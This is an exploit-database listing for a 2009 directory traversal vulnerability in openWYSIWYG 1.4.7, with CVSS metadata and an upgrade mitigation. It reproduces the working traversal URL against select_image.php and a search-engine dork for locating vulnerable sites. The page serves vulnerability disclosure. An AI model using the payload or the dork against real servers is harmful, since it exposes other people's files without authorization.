header-logo
Suggest Exploit
vendor:
openWYSIWYG
by:
Juri Gianni aka yeat
7,5
CVSS
HIGH
Local Directory Transversal
22
CWE
Product Name: openWYSIWYG
Affected Version From: 1.4.7
Affected Version To: 1.4.7
Patch Exists: Yes
Related CWE: N/A
CPE: a:openwebware:openwysiwyg
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

openWYSIWYG <= 1.4.7 Local Directory Transversal Vulnerability

A vulnerability in openWYSIWYG <= 1.4.7 allows an attacker to traverse directories outside of the intended directory. This can be exploited by sending a specially crafted HTTP request to the vulnerable server, such as http://[target]/[path]/addons/imagelibrary/select_image.php?dir=../../../

Mitigation:

Upgrade to the latest version of openWYSIWYG
Source

Exploit-DB raw data:

[--- openWYSIWYG <= 1.4.7 Local Directory Transversal Vulnerability ---]

[-- Discovered by Juri Gianni aka yeat - staker[at]hotmail[dot]it --]
[-- Visit http://zeroidentity.org --]
[-- allinurl: addons/imagelibrary/select_image.php --]

http://[target]/[path]/addons/imagelibrary/select_image.php?dir=../../../

# milw0rm.com [2009-05-11]

Navigation

Suggest Exploit

Services By CQR